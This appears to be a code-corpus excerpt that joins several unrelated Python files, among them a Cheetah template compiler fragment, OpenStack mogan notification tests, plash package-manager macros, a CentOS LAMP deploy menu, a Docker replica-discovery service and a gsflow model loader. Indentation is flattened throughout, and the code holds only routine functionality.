importVarNames = impStatement[impStatement.find('import') + len('import'):].split(',')
importVarNames = [var.split()[-1] for var in importVarNames] # handles aliases
importVarNames = [var for var in importVarNames if var!='*']
self.addImportedVarNames(importVarNames) #used by #extend for auto-imports
def addAttribute(self, attribName, expr):
self._getActiveClassCompiler().addAttribute(attribName + ' =' + expr)
def addComment(self, comm):
if re.match(r'#+$',comm): # skip bar comments
return
specialVarMatch = specialVarRE.match(comm)
if specialVarMatch:
# @@TR: this is a bit hackish and is being replaced with
# #set module varName = ...
return self.addSpecialVar(specialVarMatch.group(1),
comm[specialVarMatch.end():])
elif comm.startswith('doc:'):
addLine = self.addMethDocString
comm = comm[len('doc:'):].strip()
elif comm.startswith('doc-method:'):
addLine = self.addMethDocString
comm = comm[len('doc-method:'):].strip()
elif comm.startswith('doc-module:'):
addLine = self.addModuleDocString
comm = comm[len('doc-module:'):].strip()
elif comm.startswith('doc-class:'):
addLine = self.addClassDocString
comm = comm[len('doc-class:'):].strip()
elif comm.startswith('header:'):
addLine = self.addModuleHeader
comm = comm[len('header:'):].strip()
else:
addLine = self.addMethComment
for line in comm.splitlines():
addLine(line)
## methods for module code wrapping
def getModuleCode(self):
if not self._compiled:
self.compile()
if self._moduleDef:
return self._moduleDef
else:
return self.wrapModuleDef()
__str__ = getModuleCode
def wrapModuleDef(self):
self.addSpecialVar('CHEETAH_docstring', self.setting('defDocStrMsg'))
self.addModuleGlobal('__CHEETAH_version__ = %r'%Version)
self.addModuleGlobal('__CHEETAH_versionTuple__ = %r'%(VersionTuple,))
self.addModuleGlobal('__CHEETAH_genTime__ = %r'%time.time())
self.addModuleGlobal('__CHEETAH_genTimestamp__ = %r'%self.timestamp())
if self._filePath:
timestamp = self.timestamp(self._fileMtime)
self.addModuleGlobal('__CHEETAH_src__ = %r'%self._filePath)
self.addModuleGlobal('__CHEETAH_srcLastModified__ = %r'%timestamp)
else:
self.addModuleGlobal('__CHEETAH_src__ = None')
self.addModuleGlobal('__CHEETAH_srcLastModified__ = None')
moduleDef = """%(header)s
%(docstring)s
##################################################
## DEPENDENCIES
%(imports)s
##################################################
## MODULE CONSTANTS
%(constants)s
%(specialVars)s
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %%s. Templates compiled before version %%s must be recompiled.'%%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
%(classes)s
## END CLASS DEFINITION
if not hasattr(%(mainClassName)s, '_initCheetahAttributes'):
templateAPIClass = getattr(%(mainClassName)s, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(%(mainClassName)s)
%(footer)s
""" % {'header':self.moduleHeader(),
'docstring':self.moduleDocstring(),
'specialVars':self.specialVars(),
'imports':self.importStatements(),
'constants':self.moduleConstants(),
'classes':self.classDefs(),
'footer':self.moduleFooter(),
'mainClassName':self._mainClassName,
}
self._moduleDef = moduleDef
return moduleDef
def timestamp(self, theTime=None):
if not theTime:
theTime = time.time()
return time.asctime(time.localtime(theTime))
def moduleHeader(self):
header = self._moduleShBang + '\n'
header += self._moduleEncodingStr + '\n'
if self._moduleHeaderLines:
offSet = self.setting('commentOffset')
header += (
'#' + ' '*offSet +
('\n#'+ ' '*offSet).join(self._moduleHeaderLines) + '\n')
return header
def moduleDocstring(self):
if not self._moduleDocStringLines:
return ''
return ('"""' +
'\n'.join(self._moduleDocStringLines) +
'\n"""\n')
def specialVars(self):
chunks = []
theVars = self._specialVars
keys = theVars.keys()
keys.sort()
for key in keys:
chunks.append(key + ' = ' + repr(theVars[key]) )
return '\n'.join(chunks)
def importStatements(self):
return '\n'.join(self._importStatements)
def moduleConstants(self):
return '\n'.join(self._moduleConstants)
def classDefs(self):
classDefs = [str(klass) for klass in self._finishedClasses() ]
return '\n\n'.join(classDefs)
def moduleFooter(self):
return """
# CHEETAH was developed by <NAME> and <NAME>
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=%(className)s()).run()
""" % {'className':self._mainClassName}
##################################################
## Make Compiler an alias for ModuleCompiler
Compiler = ModuleCompiler
| 2.453125 | 2 |
tests/simple_cmd_checks.py | Rhoynar/plmn-regression | 11 | 11317 | <filename>tests/simple_cmd_checks.py
# -*- coding: utf-8 -*-
import compat
import unittest
import sys
from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *
class SimpleCmdChecks(unittest.TestCase):
def test_simple_status_cmd(self):
SimpleCmds.simple_status_cmd()
assert Results.get_state('Simple Status') is not None
def test_simple_status_get_reg_status(self):
SimpleCmds.simple_status_get_reg_status()
def test_simple_status_is_registered(self):
assert SimpleCmds.simple_status_is_registered() is True
def test_simple_status_is_home(self):
assert SimpleCmds.simple_status_is_home() is True
assert SimpleCmds.simple_status_is_roaming() is False
@unittest.skip('Skipping this test since this is only applicable in connected state')
def test_simple_status_is_connected(self):
assert SimpleCmds.simple_status_is_connected() is True
@unittest.skip('Skipping this as this is only applicable for Roaming scenario')
def test_simple_status_is_roaming(self):
assert SimpleCmds.simple_status_is_roaming() is True
if __name__ == '__main__':
nargs = process_args()
unittest.main(argv=sys.argv[nargs:], exit=False)
Results.print_results()
| 2.578125 | 3 |
mogan/tests/unit/notifications/test_notification.py | GURUIFENG9139/rocky-mogan | 0 | 11318 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
from oslo_versionedobjects import fixture as object_fixture
from mogan.notifications import base as notification_base
from mogan.notifications.objects import base as notification
from mogan.objects import base
from mogan.objects import fields
from mogan.objects import server as server_obj
from mogan.tests import base as test_base
from mogan.tests.unit.db import utils as db_utils
class TestNotificationBase(test_base.TestCase):
@base.MoganObjectRegistry.register_if(False)
class TestObject(base.MoganObject):
VERSION = '1.0'
fields = {
'field_1': fields.StringField(),
'field_2': fields.IntegerField(),
'not_important_field': fields.IntegerField(),
}
@base.MoganObjectRegistry.register_if(False)
class TestNotificationPayload(notification.NotificationPayloadBase):
VERSION = '1.0'
SCHEMA = {
'field_1': ('source_field', 'field_1'),
'field_2': ('source_field', 'field_2'),
}
fields = {
'extra_field': fields.StringField(), # filled by ctor
'field_1': fields.StringField(), # filled by the schema
'field_2': fields.IntegerField(), # filled by the schema
}
def populate_schema(self, source_field):
super(TestNotificationBase.TestNotificationPayload,
self).populate_schema(source_field=source_field)
@base.MoganObjectRegistry.register_if(False)
class TestNotificationPayloadEmptySchema(
notification.NotificationPayloadBase):
VERSION = '1.0'
fields = {
'extra_field': fields.StringField(), # filled by ctor
}
@notification.notification_sample('test-update-1.json')
@notification.notification_sample('test-update-2.json')
@base.MoganObjectRegistry.register_if(False)
class TestNotification(notification.NotificationBase):
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('TestNotificationPayload')
}
@base.MoganObjectRegistry.register_if(False)
class TestNotificationEmptySchema(notification.NotificationBase):
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('TestNotificationPayloadEmptySchema')
}
expected_payload = {
'mogan_object.name': 'TestNotificationPayload',
'mogan_object.data': {
'extra_field': 'test string',
'field_1': 'test1',
'field_2': 42},
'mogan_object.version': '1.0',
'mogan_object.namespace': 'mogan'}
def setUp(self):
super(TestNotificationBase, self).setUp()
self.my_obj = self.TestObject(field_1='test1',
field_2=42,
not_important_field=13)
self.payload = self.TestNotificationPayload(
extra_field='test string')
self.payload.populate_schema(source_field=self.my_obj)
self.notification = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE,
phase=fields.NotificationPhase.START),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=self.payload)
def _verify_notification(self, mock_notifier, mock_context,
expected_event_type,
expected_payload):
mock_notifier.prepare.assert_called_once_with(
publisher_id='mogan-fake:fake-host')
mock_notify = mock_notifier.prepare.return_value.info
self.assertTrue(mock_notify.called)
self.assertEqual(mock_notify.call_args[0][0], mock_context)
self.assertEqual(mock_notify.call_args[1]['event_type'],
expected_event_type)
actual_payload = mock_notify.call_args[1]['payload']
self.assertJsonEqual(expected_payload, actual_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_emit_notification(self, mock_notifier):
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
self.notification.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update.start',
expected_payload=self.expected_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_emit_with_host_and_binary_as_publisher(self, mock_notifier):
noti = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=self.payload)
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
noti.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update',
expected_payload=self.expected_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_emit_event_type_without_phase(self, mock_notifier):
noti = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=self.payload)
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
noti.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update',
expected_payload=self.expected_payload)
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_not_possible_to_emit_if_not_populated(self, mock_notifier):
non_populated_payload = self.TestNotificationPayload(
extra_field='test string')
noti = self.TestNotification(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=non_populated_payload)
mock_context = mock.Mock()
self.assertRaises(AssertionError, noti.emit, mock_context)
mock_notifier.assert_not_called()
@mock.patch('mogan.common.rpc.NOTIFIER')
def test_empty_schema(self, mock_notifier):
non_populated_payload = self.TestNotificationPayloadEmptySchema(
extra_field='test string')
noti = self.TestNotificationEmptySchema(
event_type=notification.EventType(
object='test_object',
action=fields.NotificationAction.UPDATE),
publisher=notification.NotificationPublisher(
host='fake-host', binary='mogan-fake'),
priority=fields.NotificationPriority.INFO,
payload=non_populated_payload)
mock_context = mock.Mock()
mock_context.to_dict.return_value = {}
noti.emit(mock_context)
self._verify_notification(
mock_notifier,
mock_context,
expected_event_type='test_object.update',
expected_payload={
'mogan_object.name': 'TestNotificationPayloadEmptySchema',
'mogan_object.data': {'extra_field': u'test string'},
'mogan_object.version': '1.0',
'mogan_object.namespace': 'mogan'})
def test_sample_decorator(self):
self.assertEqual(2, len(self.TestNotification.samples))
self.assertIn('test-update-1.json', self.TestNotification.samples)
self.assertIn('test-update-2.json', self.TestNotification.samples)
notification_object_data = {
'ServerPayload': '1.0-30fefa8478f1b9b35c66868377fb6dfd',
'ServerAddressesPayload': '1.0-69caf4c36f36756bb1f6970d093ee1f6',
'ServerActionPayload': '1.0-8dc4429afa34d86ab92c9387e3ccd0c3',
'ServerActionNotification': '1.0-20087e599436bd9db62ae1fb5e2dfef2',
'ExceptionPayload': '1.0-7c31986d8d78bed910c324965c431e18',
'EventType': '1.0-589894aac7c98fb640eca394f67ad621',
'NotificationPublisher': '1.0-4b0b0d662b21eeed0b23617f3f11794b'
}
class TestNotificationObjectVersions(test_base.TestCase):
def setUp(self):
super(test_base.TestCase, self).setUp()
base.MoganObjectRegistry.register_notification_objects()
def test_versions(self):
noti_class = base.MoganObjectRegistry.notification_classes
classes = {cls.__name__: [cls] for cls in noti_class}
checker = object_fixture.ObjectVersionChecker(obj_classes=classes)
# Compute the difference between actual fingerprints and
# expect fingerprints. expect = actual = {} if there is no change.
expect, actual = checker.test_hashes(notification_object_data)
self.assertEqual(expect, actual,
"Some objects fields or remotable methods have been "
"modified. Please make sure the version of those "
"objects have been bumped and then update "
"expected_object_fingerprints with the new hashes. ")
def test_notification_payload_version_depends_on_the_schema(self):
@base.MoganObjectRegistry.register_if(False)
class TestNotificationPayload(notification.NotificationPayloadBase):
VERSION = '1.0'
SCHEMA = {
'field_1': ('source_field', 'field_1'),
'field_2': ('source_field', 'field_2'),
}
fields = {
'extra_field': fields.StringField(), # filled by ctor
'field_1': fields.StringField(), # filled by the schema
'field_2': fields.IntegerField(), # filled by the schema
}
checker = object_fixture.ObjectVersionChecker(
{'TestNotificationPayload': (TestNotificationPayload,)})
old_hash = checker.get_hashes(extra_data_func=get_extra_data)
TestNotificationPayload.SCHEMA['field_3'] = ('source_field',
'field_3')
new_hash = checker.get_hashes(extra_data_func=get_extra_data)
self.assertNotEqual(old_hash, new_hash)
def get_extra_data(obj_class):
extra_data = tuple()
# Get the SCHEMA items to add to the fingerprint
# if we are looking at a notification
if issubclass(obj_class, notification.NotificationPayloadBase):
schema_data = collections.OrderedDict(
sorted(obj_class.SCHEMA.items()))
extra_data += (schema_data,)
return extra_data
class TestServerActionNotification(test_base.TestCase):
@mock.patch('mogan.notifications.objects.server.'
'ServerActionNotification._emit')
def test_send_version_server_action(self, mock_emit):
# Make sure that the notification payload chooses the values in
# server.flavor.$value instead of server.$value
fake_server_values = db_utils.get_test_server()
server = server_obj.Server(**fake_server_values)
notification_base.notify_about_server_action(
mock.MagicMock(),
server,
'test-host',
fields.NotificationAction.CREATE,
fields.NotificationPhase.START,
'mogan-compute')
self.assertEqual('server.create.start',
mock_emit.call_args_list[0][1]['event_type'])
self.assertEqual('mogan-compute:test-host',
mock_emit.call_args_list[0][1]['publisher_id'])
payload = mock_emit.call_args_list[0][1]['payload'][
'mogan_object.data']
self.assertEqual(fake_server_values['uuid'], payload['uuid'])
self.assertEqual(fake_server_values['flavor_uuid'],
payload['flavor_uuid'])
self.assertEqual(fake_server_values['status'], payload['status'])
self.assertEqual(fake_server_values['user_id'], payload['user_id'])
self.assertEqual(fake_server_values['availability_zone'],
payload['availability_zone'])
self.assertEqual(fake_server_values['name'], payload['name'])
self.assertEqual(fake_server_values['image_uuid'],
payload['image_uuid'])
self.assertEqual(fake_server_values['project_id'],
payload['project_id'])
self.assertEqual(fake_server_values['description'],
payload['description'])
self.assertEqual(fake_server_values['power_state'],
payload['power_state'])
| 1.890625 | 2 |
plash/macros/packagemanagers.py | 0xflotus/plash | 0 | 11319 | from plash.eval import eval, register_macro, shell_escape_args
@register_macro()
def defpm(name, *lines):
'define a new package manager'
@register_macro(name, group='package managers')
@shell_escape_args
def package_manager(*packages):
if not packages:
return
sh_packages = ' '.join(pkg for pkg in packages)
expanded_lines = [line.format(sh_packages) for line in lines]
return eval([['run'] + expanded_lines])
package_manager.__doc__ = "install packages with {}".format(name)
eval([[
'defpm',
'apt',
'apt-get update',
'apt-get install -y {}',
], [
'defpm',
'add-apt-repository',
'apt-get install software-properties-common',
'run add-apt-repository -y {}',
], [
'defpm',
'apk',
'apk update',
'apk add {}',
], [
'defpm',
'yum',
'yum install -y {}',
], [
'defpm',
'dnf',
'dnf install -y {}',
], [
'defpm',
'pip',
'pip install {}',
], [
'defpm',
'pip3',
'pip3 install {}',
], [
'defpm',
'npm',
'npm install -g {}',
], [
'defpm',
'pacman',
'pacman -Sy --noconfirm {}',
], [
'defpm',
'emerge',
'emerge {}',
]])
| 1.84375 | 2 |
app/schemas/email.py | waynesun09/notify-service | 5 | 11320 | <reponame>waynesun09/notify-service
from typing import Optional, List
from pydantic import BaseModel, EmailStr
from . import result
class EmailBase(BaseModel):
email: Optional[EmailStr] = None
class EmailSend(EmailBase):
msg: str
class EmailResult(BaseModel):
pre_header: Optional[str] = None
begin: Optional[str] = None
content: List[result.Result]
end: Optional[str] = None
| 2.328125 | 2 |
example.py | ErikPel/rankedchoicevoting | 1 | 11321 | <filename>example.py
from rankedchoicevoting import Poll
candidatesA = {"Bob": 0, "Sue": 0, "Bill": 0}
#votes in array sorted by first choice to last choice
votersA = {
"a": ['Bob', 'Bill', 'Sue'],
"b": ['Sue', 'Bob', 'Bill'],
"c": ['Bill', 'Sue', 'Bob'],
"d": ['Bob', 'Bill', 'Sue'],
"f": ['Sue', 'Bob', 'Bill']
}
election = Poll(candidatesA,votersA)
election.addCandidate("Joe", 0)
election.addVoter("g",['Joe','Bob'])
print("Winner: " + election.getPollResults())
| 3.5625 | 4 |
DeployScript.py | junoteam/TelegramBot | 3 | 11322 | <reponame>junoteam/TelegramBot<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: Alex -*-
from Centos6_Bit64 import *
from SystemUtils import *
# Checking version of OS should happened before menu appears
# Check version of CentOS
SystemUtils.check_centos_version()
# Clear screen before to show menu
os.system('clear')
answer = True
while answer:
print ("""
LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit:
---------------------------------------------------
1. Check version of your CentOS
2. Check Internet connection
3. Show me my local IP address
4. Open port 80 to Web
5. Show me my localhost name
------- LAMP for CentOS 6.x -----------
6. Install EPEL & IUS repository
7. Install Web Server - Apache
8. Install Database - MySQL
9. Install Language - PHP
10. Install LAMP in "One Click" - CentOS 6.x
11. Exit/Quit
""")
answer = input("Please make your choice: ")
if answer == 1:
os.system('clear')
print ('\nChecking version of the system: ')
SystemUtils.check_centos_version()
elif answer == 2:
os.system('clear')
print ('\nChecking if you connected to the Internet')
SystemUtils.check_internet_connection()
elif answer == 3:
os.system('clear')
print ('\nYour local IP address is: ' + SystemUtils.check_local_ip())
elif answer == 4:
os.system('clear')
print('\nChecking firewall')
Centos6Deploy.iptables_port()
elif answer == 5:
print "Checking local hostname..."
SystemUtils.check_host_name()
elif answer == 6:
print ('\nInstalling EPEL and IUS repository to the system...')
Centos6Deploy.add_repository()
elif answer == 7:
print ('\nInstalling Web Server Apache...')
Centos6Deploy.install_apache()
elif answer == 8:
print ('\nInstalling database MySQL...')
Centos6Deploy.install_mysql()
elif answer == 9:
print('\nInstalling PHP...')
Centos6Deploy.install_php()
elif answer == 10:
print ('Install LAMP in "One Click" - CentOS 6.x')
Centos6Deploy.iptables_port()
Centos6Deploy.add_repository()
Centos6Deploy.install_mysql()
Centos6Deploy.install_php()
elif answer == 11:
print("\nGoodbye...\n")
answer = None
else:
print ('\nNot valid Choice, Try Again')
answer = True | 2.28125 | 2 |
distributed/register/application.py | ADKosm/concurrency | 0 | 11323 | <reponame>ADKosm/concurrency<filename>distributed/register/application.py
import asyncio
import os
import time
from dataclasses import dataclass
import requests_unixsocket
from aiohttp import ClientSession, web
@dataclass(frozen=True)
class Replica:
replica_id: str
ip: str
is_self: bool
def replicas_discovery():
session = requests_unixsocket.Session()
number_of_replicas = int(os.environ['REPLICAS'])
app_codename = os.environ['APP_CODENAME']
self_hostname = os.environ['HOSTNAME']
registered_replicas = set()
while len(registered_replicas) < number_of_replicas:
cluster_config = session.get('http+unix://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json').json()
replicas = {
Replica(
replica_id=x['Id'],
ip=x['NetworkSettings']['Networks']['register_default']['IPAddress'],
is_self=x['Id'].startswith(self_hostname)
)
for x in cluster_config
if app_codename in x['Labels']
}
registered_replicas.update(replicas)
if len(registered_replicas) < number_of_replicas:
time.sleep(2)
return registered_replicas
replicas = replicas_discovery()
self_id = next(filter(lambda x: x.is_self, replicas)).replica_id
async def index(request):
for replica in replicas:
async with ClientSession() as session:
async with session.get("http://{}:8080/hello".format(replica.ip), headers={'ReplicaId': self_id}) as r:
await r.text()
return web.Response(text='ok')
# print(r.headers['ReplicaId'], flush=True)
async def hello(request):
requested_id = request.headers['ReplicaId']
print("Hello from {}".format(requested_id), flush=True)
return web.Response(text='ok')
print(replicas, flush=True)
app = web.Application()
app.add_routes([web.get('/', index),
web.get('/hello', hello)])
web.run_app(app, host='0.0.0.0', port=8080)
| 2.546875 | 3 |
setup.py | greenaddress/txjsonrpc | 0 | 11324 | <gh_stars>0
from __future__ import absolute_import
from setuptools import setup
from txjsonrpc import meta
from txjsonrpc.util import dist
setup(
name=meta.display_name,
version=meta.version,
description=meta.description,
author=meta.author,
author_email=meta.author_email,
url=meta.url,
license=meta.license,
packages=dist.findPackages(meta.library_name),
long_description=dist.catReST(
"docs/PRELUDE.txt",
"README",
"docs/DEPENDENCIES.txt",
"docs/INSTALL.txt",
"docs/USAGE.txt",
"TODO",
"docs/HISTORY.txt",
stop_on_errors=True,
out=True),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
],
)
| 1.265625 | 1 |
gsflow/gsflow.py | pygsflow/pygsflow | 17 | 11325 | <reponame>pygsflow/pygsflow<gh_stars>10-100
# -*- coding: utf-8 -*-
import os
from .control import ControlFile
from .prms import PrmsModel
from .utils import gsflow_io, GsConstant
from .prms import Helper
from .modflow import Modflow
from .modsim import Modsim
import flopy
import subprocess as sp
import platform
import warnings
warnings.simplefilter("always", PendingDeprecationWarning)
warnings.simplefilter("always", UserWarning)
class GsflowModel(object):
"""
GsflowModel is the GSFLOW model object. This class can be used
to build a GSFLOW model, to load a GSFLOW model from it's control file,
to write input files for GSFLOW and to run GSFLOW.
Parameters
----------
control_file : str
control file path and name
prms : PrmsModel object
gsflow.prms.PrmsModel
mf : Modflow object
gsflow.modflow.Modflow
modflow_only : bool
flag that indicates only Modflow model
prms_only : bool
flag that indicates only PRMS model
gsflow_exe : str
GSFLOW executable path and name
modsim : bool
boolean flag to indicate that modsim is active
this creates a gsflow.modsim.Modsim object
model_ws : str, None
override method to set the base model directory when the
GSFLOW control file is not located in the same directory as
the script to run GSFLOW
Examples
--------
load from control file
>>> import gsflow
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
create new, empty gsflow object
>>> control = gsflow.ControlFile(records_list=[])
>>> gsf = gsflow.GsflowModel(control=control)
"""
def __init__(
self,
control=None,
prms=None,
mf=None,
modflow_only=False,
prms_only=False,
gsflow_exe=None,
modsim=False,
model_ws=None,
):
if not isinstance(control, ControlFile):
raise ValueError("control must be a ControlFile object")
self.control = control
self.control_file = os.path.abspath(control.control_file)
self.ws = None
self._modflow_only = modflow_only
self._prms_only = prms_only
self.prms = None
self.mf = None
self.modsim = None
self.gsflow_exe = gsflow_exe
if gsflow_exe is None:
self.gsflow_exe = os.path.join(
os.path.dirname(__file__), r"bin\gsflow.exe"
)
# set prms object
if not modflow_only:
if prms and isinstance(prms, PrmsModel):
self.prms = prms
else:
err = "prms is not a PrmsModel object, skipping..."
warnings.warn(err, UserWarning)
# set flopy modflow object
if not prms_only:
if mf and isinstance(mf, flopy.modflow.Modflow):
self.mf = mf
namefile = os.path.basename(
control.get_values("modflow_name")[0]
)
if namefile is not None:
self.mf.namefile = namefile
else:
err = "modflow is not a gsflow.modflow.Modflow object, skipping..."
warnings.warn(err, UserWarning)
if modsim:
self.modsim = Modsim(self)
self.help = Helper()
@property
def modflow_only(self):
"""
Returns
-------
bool
"""
return self._modflow_only
@property
def prms_only(self):
"""
Returns
-------
bool
"""
return self._prms_only
def export_nc(self, f, **kwargs):
"""
Method to export the GSFLOW model as a netcdf
file. This method only works if nhru is equivalent
to nrow * ncol in modflow.
Parameters
----------
f : str
netcdf file name
kwargs :
keyword arguments for netcdf
"""
if not f.endswith(".nc"):
raise AssertionError("f must end with .nc extension")
if self.mf is None:
err = "Modflow object must be loaded to export netcdf file"
raise AssertionError(err)
f = self.mf.export(f, **kwargs)
if self.prms is not None:
f = self.prms.export_nc(f, self.mf, **kwargs)
return f
@staticmethod
def load_from_file(
control_file,
gsflow_exe="gsflow.exe",
modflow_only=False,
prms_only=False,
mf_load_only=None,
forgive=False,
model_ws=None,
):
"""
Method to load a gsflow model from it's control file
Parameters
----------
control_file : str
control file path & name, GSFLOW
gsflow_exe : str
gsflow executable path & name
modflow_only : bool
flag to load only modflow from the control file
prms_only : bool
flag to load only prms from the control file
mf_load_only : list
list of packages to load from modflow ex. [DIS, BAS, LPF]
forgive : bool
forgive file loading errors in flopy
model_ws : str, None
override method to set the base model directory when the
GSFLOW control file is not located in the same directory as
the script to run GSFLOW
Returns
-------
GsflowModel object
Examples
--------
>>> import gsflow
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
"""
prms = None
modflow = None
modsim = False
if not (os.path.isfile(control_file)):
raise ValueError("Cannot find control file")
if model_ws is not None:
control = ControlFile.load_from_file(control_file, abs_path=False)
else:
control = ControlFile.load_from_file(control_file)
print("Control file is loaded")
mode = control.get_values("model_mode")[0].upper()
if mode == "MODFLOW":
modflow_only = True
elif mode == "PRMS":
prms_only = True
elif "MODSIM" in mode:
modsim = True
else:
pass
# load prms
if not modflow_only:
print("Working on loading PRMS model ...")
prms = PrmsModel.load_from_file(control_file, model_ws=model_ws)
if not prms_only:
# get model mode
if "GSFLOW" in mode.upper() or "MODFLOW" in mode.upper():
print("Working on loading MODFLOW files ....")
modflow = GsflowModel._load_modflow(
control, mf_load_only, model_ws, forgive
)
print("MODFLOW files are loaded ... ")
else:
prms_only = True
modflow_only = False
print("Mode is set to PRMS only, loading PRMS model only")
return GsflowModel(
control=control,
prms=prms,
mf=modflow,
modflow_only=modflow_only,
prms_only=prms_only,
gsflow_exe=gsflow_exe,
modsim=modsim,
)
@staticmethod
def _load_modflow(control, mf_load_only, model_ws=None, forgive=False):
"""
The package files in the .nam file are relative to the execuatble
gsflow. Here we set the model_ws to the location of the gsflow exe, via
the control file or a user supplied model_ws parameter
Parameters
----------
control : ControlFile object
control file object
mf_load_only : list
list of packages to restrict modflow loading to
model_ws : str
optional parameter that allows the use to set the model_ws
forgive : bool
forgive file load errors in modflow
Returns
-------
Modflow object
"""
name = control.get_values("modflow_name")
control_file = control.control_file
if model_ws is None:
name = gsflow_io.get_file_abs(
control_file=control_file, fn=name[0]
)
model_ws, name = os.path.split(name)
else:
model_ws = gsflow_io.get_file_abs(model_ws=model_ws)
name = name[0]
control_file = None
return Modflow.load(
name,
model_ws=model_ws,
control_file=control_file,
load_only=mf_load_only,
forgive=forgive,
)
def write_input(self, basename=None, workspace=None, write_only=None):
"""
Write input files for gsflow. Four cases are possible:
(1) if basename and workspace are None,then the exisiting files will be overwritten
(2) if basename is specified, only file names will be changes
(3) if only workspace is specified, only folder will be changed
(4) when both basename and workspace are specifed both files are changed
Parameters
----------
basename : str
project basename
workspace : str
model output directory
write_only: a list
['control', 'parameters', 'prms_data', 'mf', 'modsim']
Examples
--------
>>> gsf = gsflow.GsflowModel.load_from_file('gsflow.control')
>>> gsf.write_input(basename="new", workspace="../new_model")
"""
print("Writing the project files .....")
if workspace is not None:
workspace = os.path.abspath(workspace)
if (basename, workspace) == (None, None):
print("Warning: input files will be overwritten....")
self._write_all(write_only)
# only change the directory
elif basename is None and workspace is not None:
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.model_dir = workspace
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
if self.prms is not None:
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
curr_file = os.path.relpath(
os.path.join(workspace, self.prms.data.name),
self.control.model_dir,
)
self.prms.data.model_dir = workspace
self.control.set_values("data_file", [curr_file])
# change mf
if self.mf is not None:
self.mf.change_model_ws(workspace, reset_external=True)
mfnm = self.mf.name + ".nam"
self.control.set_values("modflow_name", [mfnm])
# update file names in control object
self._update_control_fnames(workspace, basename)
# write
if self.prms is not None:
self.prms.control = self.control
self._write_all(write_only)
# only change the basename
elif basename is not None and workspace is None:
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(
self.prms.parameters.parameters_list
):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = self.control.model_dir
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.relpath(
os.path.join(self.prms.data.model_dir, dfile),
self.control.model_dir,
)
self.prms.data.name = dfile
self.control.set_values("data_file", [curr_file])
# change mf
if self.mf is not None:
curr_dir = self.mf.model_ws
self.mf._set_name(basename)
self._update_mf_basename(basename)
mfnm = self.mf.name + ".nam"
self.control.set_values("modflow_name", [mfnm])
# update file names in control object
self._update_control_fnames(workspace, basename)
self.prms.control = self.control
self._write_all(write_only)
# change both directory & basename
elif basename is not None and workspace is not None:
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.model_dir = workspace
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
# get param files list
flist = self.prms.parameters.parameter_files
